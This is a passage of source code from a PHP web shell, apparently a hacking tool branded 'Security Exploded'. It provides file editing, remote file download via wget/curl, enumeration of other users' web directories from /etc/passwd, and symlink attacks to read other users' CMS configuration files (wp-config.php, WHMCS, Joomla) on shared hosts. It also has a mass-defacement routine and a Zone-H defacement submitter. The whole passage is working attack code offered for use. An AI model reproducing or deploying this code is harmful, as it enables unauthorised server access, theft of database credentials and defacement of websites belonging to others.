1626 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1627 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1628 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1629 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?y=$pwd&delete=$file\">Delete</a> | <a href=\"?y=$pwd&dl=$file\">Download</a> (<a href=\"?y=$pwd&dlgzip=$file\">GZip</a>)</td></tr>
1630 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">Text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">Code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">Image</a></td></tr>
1631 </table>
1632 ";
1633 if(isset($_GET['type']) && ($_GET['type']=='image')){
1634 echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
1635 }
1636 elseif(isset($_GET['type']) && ($_GET['type']=='code')){
1637 echo "<div class=\"viewfile\">";
1638 $file = wordwrap(@file_get_contents($file),"240","\n");
1639 @highlight_string($file);
1640 echo "</div>";
1641 }
1642 else {
1643 echo "<div class=\"viewfile\">";
1644 echo nl2br(htmlentities((@file_get_contents($file))));
1645 echo "</div>";
1646 }
1647 }
1648 elseif(is_dir($_GET['view'])){
1649 echo showdir($pwd,$prompt);
1650 }
1651
1652}
1653elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){@ini_set('output_buffering',0);
1654
1655 if(isset($_POST['save'])){
1656 $file = $_POST['saveas'];
1657 $content = magicboom($_POST['content']);
1658 if($filez = @fopen($file,"w")){
1659 $time = date("d-M-Y H:i",time());
1660 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1661 else $msg = "failed to save";
1662 @fclose($filez);
1663 }
1664 else $msg = "permission denied";
1665 }
1666 if(!isset($file)) $file = $_GET['edit'];
1667 if($filez = @fopen($file,"r")){
1668 $content = "";
1669 while(!feof($filez)){
1670 $content .= htmlentities(str_replace("''","'",fgets($filez)));
1671 }
1672 @fclose($filez);
1673 }
1674
1675?>
1676<form action="?y=<?=$pwd; ?>&edit=<?=$file; ?>" method="post">
1677<table class="cmdbox">
1678<tr><td colspan="2">
1679<textarea class="output" name="content">
1680<?=$content; ?>
1681</textarea>
1682<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?=$file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1683 <?=$msg; ?></td></tr>
1684</table>
1685</form>
1686<?php
1687}
1688elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
1689{
1690?>
1691<form action="?y=<?=$pwd; ?>&x=logout" method="post">
1692
1693<?php
1694 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1695 echo "<br /><br /><center>Byee !!!!!!</center>";
1696}
1697
1698//////////////////////////////////////////////////////////////////
1699///////////////////////////////////////////////////////////////////////////////
1700elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ @ini_set('output_buffering',0);
1701echo "
1702<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1703
1704 <tr>
1705 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1706 <center><b><font size=5 style=italic color=#00ff00>Uploader</font></b></center></td></tr></table>
1707";
1708if(isset($_POST['uploadcomp'])){
1709 if(is_uploaded_file($_FILES['file']['tmp_name'])){
1710 $path = magicboom($_POST['path']);
1711 $fname = $_FILES['file']['name'];
1712 $tmp_name = $_FILES['file']['tmp_name'];
1713 $pindah = $path.$fname;
1714 $stat = @move_uploaded_file($tmp_name,$pindah);
1715 if ($stat) {
1716 $msg = "file uploaded to $pindah";
1717 }
1718 else $msg = "failed to upload $fname";
1719 }
1720 else $msg = "failed to upload $fname";
1721}
1722elseif(isset($_POST['uploadurl'])){@ini_set('output_buffering',0);
1723 $pilihan = trim($_POST['pilihan']);
1724 $wurl = trim($_POST['wurl']);
1725 $path = magicboom($_POST['path']);
1726 $namafile = download($pilihan,$wurl);
1727 $pindah = $path.$namafile;
1728 if(is_file($pindah)) {
1729 $msg = "file uploaded to $pindah";
1730 }
1731 else $msg = "failed to upload $namafile";
1732
1733}
1734?>
1735<form action="?y=<?=$pwd; ?>&x=upload" enctype="multipart/form-data" method="post"><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From Computer</b></th></tr><tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
1736<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1737</tr></table></form><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From URL</b></th></tr><tr><td colspan="2"><form method="post" style="margin:0;padding:0;" action="?y=<?=$pwd; ?>&x=upload">
1738<table><tr><td>Url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
1739<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1740<tr><td><select size="1" class="inputz" name="pilihan"><option value="wwget">Wget</option><option value="wlynx">Lynx</option><option value="wfread">Fread</option><option value="wfetch">Fetch</option><option value="wlinks">Links</option><option value="wget">Get</option><option value="wcurl">Curl</option>
1741</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
1742</tr></table><div style="text-align:center;margin:2px;"><?=$msg; ?></div>
1743<?php }
1744////////////////////////////////////////////////////////////////////////////////////
1745elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @ini_set('output_buffering',0);
1746echo "
1747<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1748
1749 <tr>
1750 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1751 <center><b><font size=5 style=italic color=#00ff00>Jumping</font></b></center></td></tr></table>
1752";
1753?>
1754 <form action="?y=<?=$pwd; ?>&x=jumping" method="post">
1755 <?php
1756 echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1757($sm = ini_get('safe_mode') == 0) ?
1758$sm = 'off': die("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink> : Safe_mode = On </b></td></tr></table>");
1759
1760set_time_limit(0);
1761echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1762@$passwd = fopen('/etc/passwd','r');
1763if (!$passwd) { die ("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink> : I Can't Read [ /etc/passwd ]</b></td></tr></table>
1764<br><br><br><br><center><div class=\"info\"><b></div>
1765<br><br><div class=\"jaya\"> © ".date('Y',time())." Security Exploded </b></div></center>"); }
1766$pub = array();
1767$users = array();
1768$conf = array();
1769$i = 0;
1770
1771while(!feof($passwd)){
1772$str = fgets($passwd);
1773if ($i > 100){ $pos = strpos($str,':');
1774$username = substr($str,0,$pos);
1775$dirz = '/home/'.$username.'/public_html/';
1776if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username);
1777array_push($pub,$dirz); } } } $i++; }
1778foreach ($users as $user){
1779echo '
1780<table><tr><td>[Found !]</td>
1781 <td><a href="?y=/home/'.$user.'/public_html">/home/'.$user.'/public_html/</a><td></tr>'; }
1782 echo "</table>";
1783 }
1784
1785
1786/////////////////////////////////////////////////////////////////////////////////////
1787elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
1788{ @ini_set('output_buffering',0);
1789echo "
1790<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1791
1792 <tr>
1793 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1794 <center><b><font size=5 style=italic color=#00ff00>Multi Tool Symlink</font></b></center></td></tr></table>
1795";
1796?>
1797<form action="?y=<?=$pwd; ?>&x=symlink" method="post">
1798<form method='post'><center><table class='tabnet'><tr><th colspan='5'><b>Multi Tool Symlink</b></th></tr><tr><th><b>Manual Symlink</b></th><th><b>Auto Symlink</b></th><th><b>Domain Viewer</b></th></tr><tr><td><input class='inputzbut' type='submit'name='symlinkr' value="Manual Symlink" /></td><td><input class='inputzbut' type='submit'name='symlinks' value="Auto Symlink" /></td><td><input class='inputzbut' type='submit' name='domain' value="Domain Viewer" /></td></tr></table></center></form><br><hr><br><br>
1799<?php
1800
1801#==================[ Multi Tool Symlink ]==================#
1802
1803if(isset($_POST['domain']))
1804{
1805 ?>
1806 <form action="?y=<?=$pwd; ?>&x=dv" method="post">
1807 <center><h2>[ Domain Viewer by ]<br>Notes: If Blank(No Domain) That Mean Not Work Use Domain Viewer, You Can Use Auto Symlink Server</center><br><br>
1808 <?php
1809 function openBaseDir()
1810{
1811$openBaseDir = ini_get("open_basedir");
1812if (!$openBaseDir)
1813 {
1814 $openBaseDir = '<font color="green">OFF</font>';
1815 }
1816 else
1817 {
1818 $openBaseDir = '<font color="red">ON</font>';
1819 }
1820 return $openBaseDir;
1821}
1822
1823
1824echo '
1825 <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
1826 <td height="100" align="left" class="td1">';
1827 $pg = basename(__FILE__);
1828 $safe_mode = @ini_get('safe_mode');
1829 $dir = @getcwd();
1830 ////////////////////////////////////////////////////
1831 // LET'S PLAY ~
1832 ##.htaccess
1833@mkdir('explodedsym',0777);
1834@symlink("/","explodedsym/root");
1835$htaccss = "Options all
1836 DirectoryIndex Sux.html
1837 AddType text/plain .php
1838 AddHandler server-parsed .php
1839 AddType text/plain .html
1840 AddHandler txt .html
1841 Require None
1842 Satisfy Any";
1843
1844file_put_contents("explodedsym/.htaccess",$htaccss);
1845$etc = file_get_contents("/etc/passwd");
1846$etcz = explode("\n",$etc);
1847
1848
1849##Symlink to the ROOT :p
1850foreach($etcz as $etz){
1851$etcc = explode(":",$etz);
1852error_reporting(0);
1853
1854$current_dir = posix_getcwd();
1855$dir = explode("/",$current_dir);
1856
1857symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1858symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1859symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1860symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1861symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"explodedsym/".$etcc[0].'-PhpBB.txt');
1862symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"explodedsym/".$etcc[0].'-vBulletin.txt');
1863symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1864symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1865symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1866symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1867symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"explodedsym/".$etcc[0].'-IPB.txt');
1868symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"explodedsym/".$etcc[0].'-MyBB.txt');
1869symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"explodedsym/".$etcc[0].'-SMF.txt');
1870symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"explodedsym/".$etcc[0].'-Drupal.txt');
1871symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"explodedsym/".$etcc[0].'-e107.txt');
1872symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"explodedsym/".$etcc[0].'-Seditio.txt');
1873symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"explodedsym/".$etcc[0].'-osCommerce.txt');
1874symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1875symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1876symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1877symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1878symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1879symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1880symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1881symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1882symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1883symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1884symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1885symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1886symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1887}
1888#############################
1889 if(is_readable("/var/named")){
1890 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1891 echo'<tr><td><center><b>SITE</b></center></td><td>
1892 <center><b>USER</b></center></td>
1893 <td></center><b>SYMLINK</b></center></td>';
1894 $list = scandir("/var/named");
1895 foreach($list as $domain){
1896 if(strpos($domain,".db")){
1897 $i += 1;
1898 $domain = str_replace('.db','',$domain);
1899 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1900
1901 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1902 <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1903 <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1904 }
1905 }
1906 echo "<center>Total Domains Found: ".$i."</center><br />";
1907 }else{
1908 echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1909
1910break;
1911
1912##################################
1913error_reporting(0);
1914$etc = file_get_contents("/etc/passwd");
1915$etcz = explode("\n",$etc);
1916if(is_readable("/etc/passwd")){
1917
1918echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1919echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1920
1921$list = scandir("/var/named");
1922
1923foreach($etcz as $etz){
1924$etcc = explode(":",$etz);
1925
1926foreach($list as $domain){
1927if(strpos($domain,".db")){
1928$domain = str_replace('.db','',$domain);
1929$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1930if($owner['name'] == $etcc[0])
1931{
1932$i += 1;
1933echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1934<td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1935<td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1936}}}}
1937echo "<center>Total Domains Found: ".$i."</center><br />";}
1938
1939break;
1940###############################
1941if(is_readable("/etc/named.conf")){
1942echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1943echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1944$named = file_get_contents("/etc/named.conf");
1945preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1946foreach($domains[1] as $domain){
1947$domain = trim($domain);
1948$i += 1;
1949$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1950echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1951}
1952echo "<center>Total Domains Found: ".$i."</center><br />";
1953
1954} else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1955
1956break;
1957############################
1958if(is_readable("/etc/valiases")){
1959echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1960echo'<tr><td><center><b>SITE</b></center></td><td>
1961<center><b>USER</b></center></td><td></center>
1962<b>SYMLINK</b></center></td>';
1963$list = scandir("/etc/valiases");
1964foreach($list as $domain){
1965$i += 1;
1966$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1967echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1968<center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1969<td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1970}
1971echo "<center>Total Domains Found: ".$i."</center><br />";
1972} else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1973
1974break;
1975}
1976
1977##################################
1978
1979#==================[ Multi Tool Symlink ]==================#
1980
1981if(isset($_POST['symlinkr']))
1982{
1983@set_time_limit(0);
1984@mkdir('sym',0777);
1985error_reporting(0);
1986$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1987$op =@fopen ('sym/.htaccess','w');
1988fwrite($op ,$htaccess);
1989echo '<center><b>[ Manual Symlink ]</b><br><br>
1990<form method="post"><table class="tabnet"><th colspan="5">Manual Symlink</th><tr>
1991<td>File Path :</td><td><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/></td></tr>
1992<tr><td>Symlink Name :</td><td><input class="inputz" type="text" name="symfile" value="config.txt" size="60"/></td></tr>
1993<tr><td></td><td><input class="inputzbut" type="submit" value="Symlink" name="symlink" /></td></tr></table></form></center>';
1994$target = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink'];
1995if ($symlink) {@symlink("$target","sym/$symfile");
1996echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><center>';}}
1997
1998#==================[ Multi Tool Symlink ]==================#
1999
2000if(isset($_POST['symlinks']))
2001{
2002@set_time_limit(0);
2003echo "<center><h1>[ Auto Symlink Server]</h1></center><br><center><div class=content>";
2004$d0mains = @file("/etc/named.conf");
2005##httaces
2006if($d0mains){
2007@mkdir("explodedsyms",0777);
2008@chdir("explodedsyms");
2009@exe("ln -s / root");
2010$file3 = 'Options all
2011DirectoryIndex Sux.html
2012AddType text/plain .php
2013AddHandler server-parsed .php
2014AddType text/plain .html
2015AddHandler txt .html
2016Require None
2017Satisfy Any';
2018$fp3 = fopen('.htaccess','w');
2019$fw3 = fwrite($fp3,$file3);@fclose($fp3);
2020echo "
2021<table align=center border=1 style='width:60%;border-color:#333333;'>
2022<tr>
2023<td align=center><font size=3>S. No.</font></td>
2024<td align=center><font size=3>Domains</font></td>
2025<td align=center><font size=3>Users</font></td>
2026<td align=center><font size=3>Symlink</font></td>
2027</tr>";
2028$dcount = 1;
2029
2030foreach($d0mains as $d0main){
2031if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2032flush();
2033if(strlen(trim($domains[1][0])) > 2){
2034$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2035echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
2036<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2037<td>".$user['name']."</td>
2038<td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2039flush();
2040$dcount++;}}}
2041echo "</table>";
2042}else{
2043$TEST=@file('/etc/passwd');
2044if ($TEST){
2045@mkdir("explodedsyms",0777);
2046@chdir("explodedsyms");
2047exe("ln -s / root");
2048$file3 = 'Options all
2049 DirectoryIndex Sux.html
2050 AddType text/plain .php
2051 AddHandler server-parsed .php
2052 AddType text/plain .html
2053 AddHandler txt .html
2054 Require None
2055 Satisfy Any';
2056 $fp3 = fopen('.htaccess','w');
2057 $fw3 = fwrite($fp3,$file3);
2058 @fclose($fp3);
2059 echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
2060 <table align=center border=1><tr>
2061 <td align=center><font size=4>S. No.</font></td>
2062 <td align=center><font size=4>Users</font></td>
2063 <td align=center><font size=4>Symlink</font></td></tr>";
2064 $dcount = 1;
2065 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2066 while(!feof($file)){
2067 $s = fgets($file);
2068 $matches = array();
2069 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2070 $matches = str_replace("home/","",$matches[1]);
2071 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2072 continue;
2073 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2074 <td align=center><font class=txt>" . $matches . "</td>";
2075 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2076 $dcount++;}fclose($file);
2077 echo "</table>";}else{if($os != "Windows"){@mkdir("explodedsyms",0777);@chdir("explodedsyms");@exe("ln -s / root");$file3 = 'Options all
2078 DirectoryIndex Sux.html
2079 AddType text/plain .php
2080 AddHandler server-parsed .php
2081 AddType text/plain .html
2082 AddHandler txt .html
2083 Require None
2084 Satisfy Any';
2085 $fp3 = fopen('.htaccess','w');
2086 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2087 echo "<center>
2088 <table align=center border=1><tr>
2089 <td align=center><font size=4>Id</font></td>
2090 <td align=center><font size=4>Users</font></td>
2091 <td align=center><font size=4>Symlink</font></td></tr>";
2092 $temp = "";$val1 = 0;$val2 = 1000;
2093 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2094 if ($uid)$temp .= join(':',$uid)."\n";}
2095 echo '<br/>';$temp = trim($temp);$file5 =
2096 fopen("test.txt","w");
2097 fputs($file5,$temp);
2098 fclose($file5);$dcount = 1;$file =
2099 fopen("test.txt", "r") or exit("Unable to open file!");
2100 while(!feof($file)){$s = fgets($file);$matches = array();
2101 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2102 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2103 continue;
2104 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2105 <td align=center><font class=txt>" . $matches . "</td>";
2106 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2107 $dcount++;}
2108 fclose($file);
2109 echo "</table></div></center>";unlink("test.txt");
2110 } else
2111 echo "<center><font size=4>Cannot create Symlink</font></center>";
2112 }
2113 }
2114 }
2115}
2116/////////////////////////////////////////////////////////////////
2117/////////////////////////////////////////////////////////////////////////////////////////////
2118
2119
2120elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2121{
2122echo "
2123<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2124
2125 <tr>
2126 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2127 <center><b><font size=5 style=italic color=#00ff00>Mass Deface</font></b></center></td></tr></table>
2128";
2129error_reporting(0);?>
2130<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2131<td><table><table class="tabnet" >
2132
2133<th colspan='5'><b>Folder Mass Deface</b></th>
2134<form hethot='post'>
2135<tr>
2136 <tr>
2137 <td> Folder</td><td><input class ='inputz' style='background:black;' type='text' name='path' size='60' value="<?=getcwd();?>"></td>
2138 </tr><br>
2139 <tr>
2140 <td>File Name</td><td><input class ='inputz' style='background:black;' type='text' name='file' size='60' value="index.html"></td>
2141 </tr>
2142</tr>
2143<table class="tabnet" >
2144<th colspan='5'><b>File Code Mass Deface</b></th>
2145<tr><td></td><td>
2146<table><textarea align="center" style='background:black;' name='index' rows='15' cols='80'><?=$script_deface; ?></textarea><br>
2147<center><input class='inputzbut' type='submit' value=" Mass Deface "></center></form></table></table></table></table>
2148<br></form>
2149<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
2150/////////////
2151/////////////////////////////////////////////////////////////////
2152
2153elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
2154{ @ini_set('output_buffering',0);
2155echo "
2156<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2157
2158 <tr>
2159 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2160 <center><b><font size=5 style=italic color=#00ff00>Zone-H Submiter</font></b></center></td></tr></table>
2161";
2162?>
2163<form action="?y=<?=$pwd; ?>&x=zone" method="post">
2164
2165<br><br><center>
2166<!-- Zone-H -->
2167<form action="" method='POST'><table><table class='tabnet'>
2168<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><b>Zone-H Defacer</b></th></tr></td></tr><td height='45' colspan='2'><form method="post">
2169<input type="text" class="inputz" name="defacer" style="background:black;" placeholder="Name Of Defacer" />
2170<select name="hackmode" class="inputz" >
2171<option >---------------------------Select One---------------------------</option>
2172<option value="1">Known Vulnerability (i.e. Unpatched System)</option>
2173<option value="2" >Undisclosed (new) Vulnerability</option>
2174<option value="3" >Configuration / Admin Mistake</option>
2175<option value="4" >Brute Force Attack</option>
2176<option value="5" >Social Engineering</option>
2177<option value="6" >Web Server Intrusion</option>
2178<option value="7" >Web Server External Module Intrusion</option>
2179<option value="8" >Mail Server Intrusion</option>
2180<option value="9" >FTP Server Intrusion</option>
2181<option value="10" >SSH Server Intrusion</option>
2182<option value="11" >Telnet Server Intrusion</option>
2183<option value="12" >RPC Server Intrusion</option>
2184<option value="13" >Shares Misconfiguration</option>
2185<option value="14" >Other Server Intrusion</option>
2186<option value="15" >SQL Injection</option>
2187<option value="16" >URL Poisoning</option>
2188<option value="17" >File Inclusion</option>
2189<option value="18" >Other Web Application Bug</option>
2190<option value="19" >Remote Administrative Panel Access Bruteforcing</option>
2191<option value="20" >Remote Administrative Panel Access Password Guessing</option>
2192<option value="21" >Remote Administrative Panel Access Social Engineering</option>
2193<option value="22" >Attack Against Administrator(Password StealingSniffing)</option>
2194<option value="23" >Access Credentials Through Man In the Middle Attack</option>
2195<option value="24" >Remote Service Password Guessing</option>
2196<option value="25" >Remote Service Password Bruteforce</option>
2197<option value="26" >Rerouting After Attacking The Firewall</option>
2198<option value="27" >Rerouting After Attacking The Router</option>
2199<option value="28" >DNS Attack Through Social Engineering</option>
2200<option value="29" >DNS Attack Through Cache Poisoning</option>
2201<option value="30" >Not available</option>
2202</select>
2203
2204<select name="reason" class="inputz" >
2205<option >---------------Select One-----------------</option>
2206<option value="1" >Heh...Just For Fun!</option>
2207<option value="2" >Revenge Against That Website</option>
2208<option value="3" >Political Reasons</option>
2209<option value="4" >As a Challenge</option>
2210<option value="5" >I Just Want To Be The Best Defacer</option>
2211<option value="6" >Patriotism</option>
2212<option value="7" >Not Available</option>
2213</select>
2214<input type="hidden" name="action" value="zone"><tr><td>
2215<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains" placeholder="List Of Domains"></textarea>
2216<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
2217</form></td></tr></table></form>
2218<!-- End Of Zone-H -->
2219</td></center><br><br>
2220
2221<?php
2222function ZoneH($url, $hacker, $hackmode,$reson, $site )
2223{
2224 $k = curl_init();
2225 curl_setopt($k, CURLOPT_URL, $url);
2226 curl_setopt($k,CURLOPT_POST,true);
